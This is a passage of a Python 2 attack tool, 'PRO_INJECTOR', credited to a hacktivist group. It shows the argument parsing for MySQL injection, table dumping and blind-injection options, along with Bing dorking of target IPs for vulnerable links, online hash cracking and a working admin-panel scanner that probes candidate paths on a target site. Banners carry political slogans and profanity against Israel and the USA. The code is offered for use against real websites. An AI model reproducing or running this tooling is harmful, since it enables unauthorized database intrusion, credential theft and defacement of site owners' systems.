3852.                 print "... Hash Not Found in %s\n" % (cr.name)
3853.        
3854.        
3855.        
3856.         if hashresults:
3857.            
3858.             resultlist = []
3859.             for r in hashresults:
3860.                 if r not in resultlist:
3861.                     resultlist.append (r)
3862.                    
3863.             finalresult = ""
3864.             if len(resultlist) > 1:
3865.                 finalresult = ', '.join (resultlist)
3866.             else:
3867.                 finalresult = resultlist[0]
3868.            
3869.             crackedhashes.append ( (activehash, finalresult) )
3870.    
3871.    
3872.     if hashfile:
3873.         try:
3874.             hashestocrack.close ()
3875.         except:
3876.             pass
3877.        
3878.     print "\nThe Following Hashes Were cracked:\n----------------------------------\n" ; file.write('\n-----------------------------------------------------')
3879.     print crackedhashes and "\n".join ("%s >>>> %s" % (hashvalue, result.strip()) for hashvalue, result in crackedhashes) or "NO HASH WAS CRACKED." ; file.write(crackedhashes and "\n".join ("%s ==> %s" % (hashvalue, result.strip()) for hashvalue, result in crackedhashes) or "NO HASH WAS CRACKED.")
3880.     print
3881.    
3882.     return cracked
3883.  
3884.  
3885.  
3886.  
3887. def searchHash (hashvalue):
3888.    
3889.    
3890.     start = 0
3891.     finished = False
3892.     results = []
3893.    
3894.     sys.stdout.write("\nThe hash wasn't found in any database. Maybe Google has any idea...\nLooking for results...")
3895.     sys.stdout.flush()
3896.    
3897.     while not finished:
3898.        
3899.         sys.stdout.write('.')
3900.         sys.stdout.flush()
3901.    
3902.        
3903.         url = "http://www.google.com/search?hl=en&q=%s&filter=0" % (hashvalue)
3904.         if start:
3905.             url += "&start=%d" % (start)
3906.            
3907.        
3908.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
3909.        
3910.         response = do_HTTP_request ( url, httpheaders=headers )
3911.        
3912.         html = None
3913.         if response:
3914.             html = response.read()
3915.         else:
3916.             continue
3917.            
3918.         resultlist = findall (r'<a href="[^"]*?" class=l', html)
3919.        
3920.         new = False
3921.         for r in resultlist:
3922.             url_r = r.split('"')[1]
3923.            
3924.             if not url_r in results:
3925.                 results.append (url_r)
3926.                 new = True
3927.        
3928.         start += len(resultlist)
3929.        
3930.         if not new:
3931.             finished = True
3932.        
3933.    
3934.     if results:
3935.         print "\n\nGoogle has some results. Maybe you would like to check them manually:\n"
3936.        
3937.         results.sort()
3938.         for r in results:
3939.             print "  *> %s" % (r)
3940.         print
3941.    
3942.     else:
3943.         print "\n\nGoogle doesn't have any result. Sorry!\n"
3944.  
3945.  
3946. for arg in sys.argv:
3947.    
3948.  
3949.    if arg == "-ip" :
3950.         ip = sys.argv[count+1]
3951.    elif arg == "-dork" :
3952.         Dork = sys.argv[count+1]
3953.    elif arg == "-hash" :
3954.         hash = sys.argv[count+1]
3955.    elif arg == "--a":
3956.         mode = arg
3957.    elif arg == "--v":
3958.         mode = arg
3959.    elif arg == "--p":
3960.         mode = arg
3961.    elif arg == "--l":
3962.         mode = arg
3963.    elif arg == "--adm":
3964.         mode = arg
3965.    elif arg == "-h" :
3966.         mode = arg;algorithm = sys.argv[1].lower()
3967.    elif arg == "-u" or arg == "--url":
3968.         site = sys.argv[count+1]
3969.    elif arg == "--output":
3970.         logfile = sys.argv[count+1]
3971.    elif arg == "--php":
3972.         mode = arg  
3973.    elif arg == "--asp":
3974.         mode = arg
3975.    elif arg == "--cfm":
3976.         mode = arg
3977.    elif arg == "--cgi":
3978.         mode = arg
3979.    elif arg == "--brf":
3980.         mode = arg
3981.    elif arg == "--proxy":
3982.         proxy = sys.argv[count+1]
3983.    elif arg == "--proxyauth":
3984.         arg_proxy_auth = sys.argv[count+1]
3985.    elif arg == "--dump":
3986.         mode = arg;arg_dump = sys.argv[count]
3987.    elif arg == "--full":
3988.         mode = arg
3989.    elif arg == "--schema":
3990.         mode = arg;arg_schema = sys.argv[count]
3991.    elif arg == "--dbs":
3992.         mode = arg;arg_dbs = sys.argv[count]
3993.    elif arg == "--fuzz":
3994.         mode = arg;arg_fuzz = sys.argv[count]
3995.    elif arg == "--info":
3996.         mode = arg;arg_info = sys.argv[count]
3997.    elif arg == "--crack":
3998.         mode = arg;arg_hash = sys.argv[count+1]
3999.    elif arg == "--wordlist":
4000.         arg_wordlist = sys.argv[count+1]
4001.    elif arg == "--findcol":
4002.         mode = arg;arg_findcol = sys.argv[count]
4003.    elif arg == "--cookie":
4004.         arg_cookie = sys.argv[count+1]
4005.    elif arg == "--ssl":
4006.         arg_ssl = "on"
4007.    elif arg == "-b" or arg == "--blind":
4008.         arg_blind = arg;arg_blind = sys.argv[count]
4009.    elif arg == "-s" or arg == "--string":
4010.         arg_string = sys.argv[count+1]
4011.    elif arg == "-D":
4012.         arg_database = sys.argv[count+1]
4013.    elif arg == "-T":
4014.         arg_table = sys.argv[count+1]
4015.    elif arg == "-C":
4016.         arg_columns = sys.argv[count+1]
4017.    elif arg == "--start":
4018.         num = int(sys.argv[count+1]) - 1
4019.         table_num = num
4020.    elif arg == "-d" or arg == "--debug":
4021.         arg_debug = "on"
4022.    elif arg == "--where":
4023.         arg_where = sys.argv[count+1]
4024.    elif arg == "--orderby":
4025.         arg_orderby = sys.argv[count+1]
4026.    elif arg == "--rowdisp":
4027.         arg_rowdisp = sys.argv[count]
4028.         arg_rowdisp = 0
4029.    elif arg == "--end":
4030.         arg_end = sys.argv[count+1]
4031.         if arg_end == "--":
4032.             arg_eva = "+"
4033.         else:
4034.             arg_eva = "/**/"
4035.    count+=1
4036.    
4037. if len(sys.argv) <= 1:
4038.    print'''                                                      
4039.  
4040.                          #
4041.                           ##            
4042.                            ###
4043.                          #  ####        
4044.                           #  #####          
4045.                           ##  ######
4046.                           ###  ######
4047.                          ####   ######
4048.                         ###### ########
4049.                       ##            ####
4050.                  #  ##                ###  #
4051.                 #  ##    ###########    ##  #
4052.                ## ##    ##########      ##  ##
4053.                ## ##    #  #########    ##  ##
4054.                ## ## #      #########   ##  ##
4055.                ##### ##      #########  ##  ##
4056.                 #######  #    ############ ##
4057.                  ######  ##    ########## ##
4058.                   #### ####     ####### ##
4059.                     ######       #### ##
4060.                       #### ## ##  ####
4061.                          ## ## ## ##
4062.                                                                
4063.                  
4064.            #####   #####  ######   #########  ########                  
4065.            ##  ## ##  ##  ##      ##########  ########                  
4066.            ##    #    ##  ###### ##           ##    ##                
4067.            ##         ##  ###### ##           ########          
4068.            ##         ##  ##      ##########  ##    ##                      
4069.            ##         ##  ######   #########  ##    ##                    
4070.    {+} MIDDLE EAST CYBER ARMY! DX-PRO_INJECTOR (V 1.0){+} '''
4071.    print '================================================================================'
4072.    print '[*] This Tool Is Coded By RebelGhost Dx !                                      ||'
4073.    print '[*] GreetZ To All Members 0f MECA And All Fans  !                              ||'
4074.    print '[*] You can Scan All Sites of Any Server with Your Dork  !                     ||'
4075.    print '[*] You can Find Admin Panel !                                                 ||'
4076.    print '[*] You can Crack Hashes OnLine !                                              ||'
4077.    print '[*] You can Inject With SQLi !                                                 ||'
4078.    print '[*] You can Know Type Of Any Hash !                                            ||'
4079.    print '[*] We Are MECA Team (Middle East Cyber Army) !                                ||'
4080.    print '[*] CautioN : Dnt Use This Script Against Muslim Sites !                       ||'
4081.    print '[*] CODER: https://www.facebook.com/AnonR.DX                                   ||'
4082.    print "[+] PAGE :https://www.facebook.com/Middle.East.Cyber.Army.5                    ||"
4083.    print '[+] TWITTER : https://twitter.com/MiddleEastCybe2                              ||'
4084.    print '[+] IF YOU SEE ANY ERROR !! CONTACT US FOR HELP !!!!!!!!                       ||'
4085.    print '================================================================================'
4086.    print '                      >>>> --help TO GET HELP  <<<<                            '
4087.    sys.exit(1)
4088.  
4089. print '\t[!]   Testing Your internet settings  [!] '
4090.  
4091.  
4092.  
4093. try :
4094.    IL = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
4095.    BLOCK = 'http://whatismyipaddress.com/ip/'+IL
4096.    SITE = urllib2.urlopen(BLOCK)
4097.    HTML = SITE.read()
4098.    PAT = re.compile ('<img [^>]*src="([^"]+)')
4099.    LIEN = PAT.findall(HTML)
4100.    if 'http://cdn.whatismyipaddress.com/images/flags/il.png' in  LIEN :
4101.  
4102.      print "\n\t\t IN THE NAME OF ALLAH "
4103.      print "\n\t\t FREE GAZA"
4104.      print "\n\t\t FREE PALASTINE "
4105.      print "\n\t\t FUCK ISRAEL "
4106.      print "\n\t\t FUCK USA "
4107.      print "\n\t\t WE ARE MUSLIMS "
4108.      sys.exit(1)
4109.    else :
4110.      print ' \t\t\t=================== '
4111.      print ' \t\t\tHamdoulah it  Works  '
4112.      print ' \t\t\t===================\n\n '
4113.  
4114.  
4115.    
4116. except urllib2.URLError:
4117.     if mode == '--p' or mode == '--l' :
4118.            print ' \t\t\tThis OPTION is Work  Offline !!'
4119.            print '\t\t\t But Check Your internet settings For Lasts OPTIONS '
4120.     elif arg == "--help":
4121.             print ' \t\t\tCheck Your internet settings . Use All OPTIONS ' ;     print '\n \t You   Can Use Just ID_HASH Offline '
4122.             print '--------------- ' ; print 'ID_HASH OPTIONS ' ; print '--------------- '; print '      -hash HASH           HASH IF WANT KNOW IT ID'; print '      --p                  FOR GET ALL POSSIBLE HASHES'; print '      --l                  FOR GET LEAST POSSIBLE HASHES'
4123.             sys.exit(1)
4124.     else :
4125.            print '  Session Cancelled  !!  Check   Your internet settings '
4126.            sys.exit(1)
4127.    
4128.    
4129.  
4130. for arg in sys.argv:
4131.         if arg == "--help":
4132.            
4133.            
4134.            print '     PRO_INJECTOR CODED BY  RebelGhost-DX From MECA TEAM '
4135.            print '                MIddle East Cyber Army '
4136.            print '     USAGE   :   ./PRO_INJECTOR.py [options]'
4137.            print ' -------------------------'
4138.            print '  IP_SQLi_FINDER OPTIONS : '
4139.            print ' -------------------------'
4140.            print '      -u URL, --url=URL    TARGET URL'
4141.            print '      -ip                  TARGET IP'
4142.            print '      -dork                ANY DORK SQLi YOU LIKE USE IT EX = ( id= )'
4143.            print '      --a                  FOR GET ALL LINKS FINDING BY YOUR DORK IN TARGET IP '
4144.            print '      --v                  FOR GET ALL LINKS VULN IN TARGET IP '
4145.            print ' ------------'
4146.            print ' SQLi OPTIONS:'
4147.            print ' ------------'
4148.            print '      -d, --debug          DISPLAY URL DEBUG INFORMATIO'
4149.            print '      -u URL, --url=URL    TARGET URL'
4150.            print '      -b, --blind          USE BLIND METHODOLOGY (req: --string)'
4151.            print '      -s, --string         STRING TO MATCH IN PAGE WHEN THE QUERY IS VALID'
4152.            print '      --crack=HASH         CRACK MySQL HASHES (req: --wordlist)'
4153.            print '      --wordlist=LIS.TXT   WORDLIST TO BE USED FOR CRACKING'
4154.            print '      --dump               DUMP DATABASE TABLE ENTRIES  (req: -T)'
4155.            print '      --schema             ENUMERATE INFORMATION_SCHEMA(req: -D)'
4156.            print '      --rowdisp            DO NOT DISPLAY ROW # WHEN DUMPING'
4157.            print '      --cookie=FILE.TXT    USEA MOZILLA COOKIE FILE'
4158.            print '      --proxy=PROXY        USE A HTTP PROXY TO CONNECT TO THE TARGET URL'
4159.            print '      --orderby=COL        USEA ORDER BY CLAUSE IN  YOUR DUMP'
4160.            print '      --output=FILE.TXT    OUTPUT RESULTS OF TOOL TO THIS FILE'
4161.            print '      --where=COL,VALUE    USE A WHERE CLAUSE IN YOUR DUMP'
4162.            print '      --start=ROW          ROW NEMBER TO BEGIN DUMPING AT'
4163.            print '      --method=PUT         SELECT TO USE PUT METHOD ** NOT WORKING'
4164.            print '      --dbs                ENUMERATE DATABASES           MySQL v5+'
4165.            print '                           OPT: -T)                      MySQL v5+'
4166.            print '      --full               ENUMERATE ALL THE TOOL  CAN   MySQL v5+'
4167.            print '      --info               MySQL SERVER CONFIGURATION    MySQL v4+'
4168.            print '      --fuzz               FUEE TABLES & COLUMNS NAMES   MySQL v4+'
4169.            print '      --findcol            FIND COLUMN LENGTH            MySQL v4+'
4170.            print '                      OPT: -D, -C, --start)         MySQL v4+'
4171.            print '      -D DB                DATABASE TO ENUMERATE'
4172.            print '      -T TBL               DATABASE TABLE TO ENUMERATE'
4173.            print '      -C COL               DATABASE TABLE COLUMN TO ENUMERATE'
4174.            print '      --ssl                TO USE SSL'
4175.            print '      --end                TO USE   +  AND -- FOR THE URLS --end \--\ (Default)'
4176.            print '                           TO USE /**/ AND /* FOR THE URLS --end \/*\ '
4177.            print ' ----------------'
4178.            print ' TYPE_HASH OPTIONS:'
4179.            print ' ----------------'
4180.            print '      -hash HASH           HASH IF WANT KNOW IT TYPE'
4181.            print '      --p                  FOR GET ALL POSSIBLE HASHES '
4182.            print '      --l                  FOR GET LEAST POSSIBLE HASHES'
4183.            print ' ---------------------'
4184.            print ' HACH_CRACKER OPTIONS:'
4185.            print ' ---------------------'
4186.            print '      -h HASH              IF YOU WANT TO CRACK ONE HASH'
4187.            print '      -f FILE.txt          IF YOU HAVE SEREVAL HASHEES'
4188.            print '    ALGORITHIMS : '
4189.            print '''  
4190.                              MD4       - RFC 1320
4191.                             MD5       - RFC 1321
4192.                             SHA1      - RFC 3174 (FIPS 180-3)
4193.                             SHA224    - RFC 3874 (FIPS 180-3)
4194.                             SHA256    - FIPS 180-3
4195.                             SHA384    - FIPS 180-3
4196.                             SHA512    - FIPS 180-3
4197.                             RMD160    - RFC 2857
4198.                             GOST      - RFC 5831
4199.                             WHIRLPOOL - ISO/IEC 10118-3:2004
4200.                             LM        - Microsoft Windows hash
4201.                             NTLM      - Microsoft Windows hash
4202.                             MYSQL     - MySQL 3, 4, 5 hash
4203.                             CISCO7    - Cisco IOS type 7 encrypted passwords
4204.                             JUNIPER   - Juniper Networks $9$ encrypted passwords
4205.                             LDAP_MD5  - MD5 Base64 encoded
4206.                             LDAP_SHA1 - SHA1 Base64 encoded '''
4207.            print '    EXAMPE :'
4208.            print '      ./PRO_INJECTOR.py MD5 -h 098f6bcd4621d373cade4e832627b4f6 '
4209.            print '      ./PRO_INJECTOR.py GOST -f GOST.txt'
4210.            print ' --------------------------'
4211.            print ' ADMIN_PANEL_FINDER OPTIONS:'
4212.            print ' --------------------------'
4213.            print '      -u URL, --url=URL     TARGET URL'
4214.            print '      --php                 FIND ADMIN PANEL PHP'
4215.            print '      --asp                 FIND ADMIN PANEL ASP'
4216.            print '      --cfm                 FIND ADMIN PANEL CFM'
4217.            print '      --cgi                 FIND ADMIN PANEL CGI '
4218.            print '      --brf                 FIND ADMIN PANEL BRF'
4219.            print '   #########################################################################'
4220.            print '   ## All  Results is Written In '+logfile+' Dnt Forget Check it ^_^ ##'
4221.            print '   #########################################################################'
4222.            sys.exit(1)
4223.  
4224. if mode == '--v' or mode == '--a' :
4225.      if ip =="" :
4226.         site = site.replace('http://','') ;site = site.replace('https://','') ; site = site.replace('/','')  ;  ip = socket.gethostbyname( site )
4227.  
4228. Dork = Dork.replace(' ','+')
4229. Dork = Dork.replace("?",'%3F')
4230. Dork = Dork.replace("=",'%3D')
4231. Dork = Dork.replace(":",'%3A')
4232. Dork = Dork.replace("/",'%2F')
4233. Dork = Dork.replace("'",'%27')
4234. Dork = Dork.replace("(",'%28')
4235. Dork = Dork.replace(")",'%29')
4236. Rebel = 'http://www.bing.com/search?q=ip%3a'
4237. Ghost = '&go=Valider%2cValider&qs=ds%2cds&first='
4238. Meca1  = Rebel+ip+'+'+Dork+Ghost+'1' ; Meca2 = Rebel+ip+'+'+Dork+Ghost+'11'; Meca3 = Rebel+ip+'+'+Dork+Ghost+'21' ; Meca4 = Rebel+ip+'+'+Dork+Ghost+'31'; Meca5 = Rebel+ip+'+'+Dork+Ghost+'41'
4239. Meca6  = Rebel+ip+'+'+Dork+Ghost+'51' ; Meca7 = Rebel+ip+'+'+Dork+Ghost+'61' ; Meca8 = Rebel+ip+'+'+Dork+Ghost+'71'  ; Meca9 = Rebel+ip+'+'+Dork+Ghost+'81' ; Meca10 = Rebel+ip+'+'+Dork+Ghost+'91'
4240. Meca11 = Rebel+ip+'+'+Dork+Ghost+'101' ; Meca12 = Rebel+ip+'+'+Dork+Ghost+'111'; Meca13 = Rebel+ip+'+'+Dork+Ghost+'121' ; Meca14 = Rebel+ip+'+'+Dork+Ghost+'131'; Meca15 = Rebel+ip+'+'+Dork+Ghost+'141'
4241. Meca16 = Rebel+ip+'+'+Dork+Ghost+'151' ; Meca17 = Rebel+ip+'+'+Dork+Ghost+'161'; Meca18 = Rebel+ip+'+'+Dork+Ghost+'171' ; Meca19 = Rebel+ip+'+'+Dork+Ghost+'181'; Meca20 = Rebel+ip+'+'+Dork+Ghost+'191'
4242. Meca21 = Rebel+ip+'+'+Dork+Ghost+'201' ; Meca22 = Rebel+ip+'+'+Dork+Ghost+'211'; Meca23 = Rebel+ip+'+'+Dork+Ghost+'221' ; Meca24 = Rebel+ip+'+'+Dork+Ghost+'231'; Meca25 = Rebel+ip+'+'+Dork+Ghost+'241'
4243. Meca26 = Rebel+ip+'+'+Dork+Ghost+'251' ; Meca27 = Rebel+ip+'+'+Dork+Ghost+'261'; Meca28 = Rebel+ip+'+'+Dork+Ghost+'271' ; Meca29 = Rebel+ip+'+'+Dork+Ghost+'281'; Meca30 = Rebel+ip+'+'+Dork+Ghost+'291'
4244. Meca31 = Rebel+ip+'+'+Dork+Ghost+'301' ; Meca32 = Rebel+ip+'+'+Dork+Ghost+'311'; Meca33 = Rebel+ip+'+'+Dork+Ghost+'321' ; Meca34 = Rebel+ip+'+'+Dork+Ghost+'331'; Meca35 = Rebel+ip+'+'+Dork+Ghost+'341'
4245. Meca36 = Rebel+ip+'+'+Dork+Ghost+'351' ; Meca37 = Rebel+ip+'+'+Dork+Ghost+'361'; Meca38 = Rebel+ip+'+'+Dork+Ghost+'371' ; Meca39 = Rebel+ip+'+'+Dork+Ghost+'381'; Meca40 = Rebel+ip+'+'+Dork+Ghost+'391'
4246. Meca41 = Rebel+ip+'+'+Dork+Ghost+'401' ; Meca42 = Rebel+ip+'+'+Dork+Ghost+'411'; Meca43 = Rebel+ip+'+'+Dork+Ghost+'421' ; Meca44 = Rebel+ip+'+'+Dork+Ghost+'431'; Meca45 = Rebel+ip+'+'+Dork+Ghost+'441'
4247. Meca46 = Rebel+ip+'+'+Dork+Ghost+'451' ; Meca47 = Rebel+ip+'+'+Dork+Ghost+'461'; Meca48 = Rebel+ip+'+'+Dork+Ghost+'471' ; Meca49 = Rebel+ip+'+'+Dork+Ghost+'481'; Meca50 = Rebel+ip+'+'+Dork+Ghost+'491'
4248. Islam=[]
4249. Muslim=[]
4250. D1=0 ; D2=0 ; D3=0 ; D4=0 ; D5=0; D6=0 ; D7=0 ; D8=0 ; D9=0 ; D10=0
4251. D11=0 ; D12=0 ; D13=0 ; D14=0 ; D15=0; D16=0 ; D17=0 ; D18=0 ; D19=0 ; D20=0
4252. D21=0 ; D22=0 ; D23=0 ; D24=0 ; D25=0; D26=0 ; D27=0 ; D28=0 ; D29=0 ; D30=0
4253. D31=0 ; D32=0 ; D33=0 ; D34=0 ; D35=0; D36=0 ; D37=0 ; D38=0 ; D39=0 ; D40=0
4254. D41=0 ; D42=0 ; D43=0 ; D44=0 ; D45=0; D46=0 ; D47=0 ; D48=0 ; D49=0 ; D50=0
4255. x=0
4256. Y=[]
4257. b=0
4258. See = []
4259. def GREATEST(seq, idfun=None):
4260.    if idfun is None:
4261.     def idfun(x): return x
4262.     seen = {}
4263.    for item in seq:
4264.     marker = idfun(item)
4265.     if marker in seen: continue
4266.     seen[marker] = 1
4267.     Muslim.append(item)
4268. def RebelGhost(seq, idfun=None):
4269.    if idfun is None:
4270.     def idfun(x): return x
4271.     seen = {}
4272.    for item in seq:
4273.     marker = idfun(item)
4274.     if marker in seen: continue
4275.     seen[marker] = 1
4276.     See.append(item)
4277.  
4278. def ANACONDA(Num,Var):
4279.  Var[Num]=Var[Num].replace("http://www.microsofttranslator.com/","")
4280.  Var[Num]=Var[Num].replace("http://go.microsoft.com/","")
4281.  Var[Num]=Var[Num].replace("http://onlinehelp.microsoft.com","")
4282.  Var[Num]=Var[Num].replace("javascript:","")
4283.  
4284.  
4285.  if ':' in list(Var[Num])  :
4286.   Islam.append(Var[Num])
4287.  
4288. def Kh_Mar404(Hunter,a):
4289.  Bing = urllib2.urlopen(Hunter)
4290.  Html = Bing.read()
4291.  Pat= re.compile ('<a [^>]*href="([^"]+)')
4292.  Lien = Pat.findall(Html)
4293.  while a<len(Lien):
4294.   ANACONDA(a,Lien)
4295.   a=a+1
4296.  
4297. def Hajar() :
4298.  
4299.   Kh_Mar404(Meca1,D1); Kh_Mar404(Meca2,D2); Kh_Mar404(Meca3,D3); Kh_Mar404(Meca4,D4); Kh_Mar404(Meca5,D5)
4300.   Kh_Mar404(Meca6,D6); Kh_Mar404(Meca7,D7); Kh_Mar404(Meca8,D8); Kh_Mar404(Meca9,D9); Kh_Mar404(Meca10,D10)
4301.   Kh_Mar404(Meca11,D11) ; Kh_Mar404(Meca12,D12) ; Kh_Mar404(Meca13,D13) ; Kh_Mar404(Meca14,D14) ; Kh_Mar404(Meca15,D15)
4302.   Kh_Mar404(Meca16,D16) ; Kh_Mar404(Meca17,D17) ; Kh_Mar404(Meca18,D18) ; Kh_Mar404(Meca19,D19) ; Kh_Mar404(Meca20,D20)
4303.   Kh_Mar404(Meca21,D21) ; Kh_Mar404(Meca22,D22) ; Kh_Mar404(Meca23,D23) ; Kh_Mar404(Meca24,D24) ; Kh_Mar404(Meca25,D25)
4304.   Kh_Mar404(Meca26,D26) ; Kh_Mar404(Meca27,D27) ; Kh_Mar404(Meca28,D28) ; Kh_Mar404(Meca29,D29) ; Kh_Mar404(Meca30,D30)
4305.   Kh_Mar404(Meca31,D31) ; Kh_Mar404(Meca32,D32) ; Kh_Mar404(Meca33,D33) ; Kh_Mar404(Meca34,D34) ; Kh_Mar404(Meca35,D35)
4306.   Kh_Mar404(Meca36,D36) ; Kh_Mar404(Meca37,D37) ; Kh_Mar404(Meca38,D38) ; Kh_Mar404(Meca39,D39) ; Kh_Mar404(Meca40,D40)
4307.   Kh_Mar404(Meca41,D41) ; Kh_Mar404(Meca42,D42) ; Kh_Mar404(Meca43,D43) ; Kh_Mar404(Meca44,D44) ; Kh_Mar404(Meca45,D45)
4308.   Kh_Mar404(Meca46,D46) ; Kh_Mar404(Meca47,D47) ; Kh_Mar404(Meca48,D48) ; Kh_Mar404(Meca49,D49) ; Kh_Mar404(Meca50,D40)
4309.   GREATEST(Islam)
4310.  
4311.  
4312.  
4313. file = open(logfile, "a")
4314.  
4315. print '\t####################################################################'
4316. print '\t## ^_^ Coded By RebelGhost-DX .. Middle East Cyber Army! Team ^_^ ##'  
4317. print '\t##  ------------------------------------------------------------  ##'
4318. print '\t## [!] PRO_INJECTOR.py [-] Profficional MySQL Injection Tool [!]  ##'
4319. print '\t##  ------------------------------------------------------------  ##'
4320. print '\t##  {!} MySQL_Injection_Tool [+] IP_SQli_Reserve [+] Id_Hash {!}  ## '
4321. print '\t##      {!} Hash_Cracker_Online [+] Admin_Panel_Finder {!}        ## '
4322. print '\t##  ------------------------------------------------------------  ##'
4323. print '\t##  In The Name OF Allah !! ^_^ !! Free Gaza ! Free Palestine     ## '
4324. print '\t####################################################################'
4325. print '\t######################  '+strftime("%Y-%m-%d %H:%M:%S", gmtime())+'  #######################'
4326. print '\t####################################################################'
4327. print '\n\n\n'
4328.                  
4329. file.write("\n\n\n\t####################################################################")
4330. file.write("\n\t## ^_^ Coded By RebelGhost-DX .. Middle East Cyber Army! Team ^_^ ##")
4331. file.write("\n\t##  ------------------------------------------------------------  ##")
4332. file.write("\n\t## [!] PRO_INJECTOR.py [-] Profficional MySQL Injection Tool [!]  ##")
4333. file.write("\n\t##  ------------------------------------------------------------  ##")
4334. file.write("\n\t##  {!} MySQL_Injection_Tool [+] IP_SQli_Reserve [+] Id_Hash {!}  ##")
4335. file.write("\n\t##       {!} Hash_Cracker_Online [+] Admin_Panel_Finder {!}       ##")
4336. file.write("\n\t##  ------------------------------------------------------------  ##")
4337. file.write("\n\t##  In The Name OF Allah !! ^_^ !! Free Gaza ! Free Palestine     ##")
4338. file.write("\n\t####################################################################")
4339. file.write("\n\t######################  "+strftime("%Y-%m-%d %H:%M:%S", gmtime())+"  #######################")
4340. file.write("\n\t#################################################################### \n\n\n")
4341.  
4342. if mode == "--p":
4343.     ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
4344.     if len(jerar)==0:
4345.      print "----------"
4346.      print "NOT FOUND" ;file.write( hash +'Not Found')
4347.  
4348.      print "----------"
4349.      sys.exit(1)
4350.    
4351.     elif len(jerar)>2:
4352.         jerar.sort()
4353.         print "----------------"
4354.         print "POSSIBLE HASHES:" ;file.write( "HASH IS : "+hash + " : \nPOSSIBLE HASHES:")
4355.  
4356.         print "----------------" ;file.write(' \n -------------------')
4357.         print "[+] ",algorithms[jerar[0]] ;file.write( "\n[+] "+algorithms[jerar[0]])
4358.         print "[+] ",algorithms[jerar[1]] ;file.write( "\n[+] "+algorithms[jerar[1]])
4359.         print "" ; sys.exit(1)
4360.        
4361.     else:
4362.         jerar.sort()
4363.         print "----------------"
4364.         print "POSSIBLE HASHES:" ;file.write( hash +" :\nPOSSIBLE HASHES:")
4365.        
4366.         print "----------------"
4367.         for a in range(len(jerar)):
4368.             print "[+] ",algorithms[jerar[a]] ;file.write( "\n [+] "+algorithms[jerar[a]])
4369.         sys.exit(1)    
4370. if mode == "--php" :
4371.         site = site.replace('https://','')
4372.         site = site.replace('http://','')
4373.         try:
4374.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4375.           conn = httplib.HTTPConnection(site)
4376.           conn.connect()
4377.           print "\t[!] YES ^_^ ... SERVER Is Online."
4378.         except (httplib.HTTPResponse, socket.error) as Exit:
4379.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4380.            sys.exit(1)
4381.            
4382.         print("\t [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4383.         for admin in php:
4384.             admin = admin.replace("\n","")
4385.             admin = "/" + admin
4386.             host = site + admin
4387.              
4388.            
4389.             print ("\t [+] Checking " + host + "...")
4390.             connection = httplib.HTTPConnection(site)
4391.             connection.request("GET",admin)
4392.             response = connection.getresponse()
4393.             var2 = var2 + 1
4394.             if response.status == 200:
4395.                 var1 = var1 + 1
4396.                 print ( "\n\n >>> " + host, " Admin Panel Found! ^_^ ") ; file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4397.                 raw_input("Press ENTER To Continue ....\n")
4398.             elif response.status == 404:
4399.                 var2 = var2
4400.             elif response.status == 302:
4401.                 print "\n >>> " + host, " Possible Admin Panel (302 - Redirect)" ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4402.             else:
4403.                 print (host, " Interesting Response:", response.status)
4404.             connection.close()
4405.         print("\n\n TH3  END \n")
4406.         print " Admin Panels found : " ,var1
4407.         print " Total Pages Scanned : " ,var2
4408.         sys.exit(1)    
4409. if mode == "--l":  
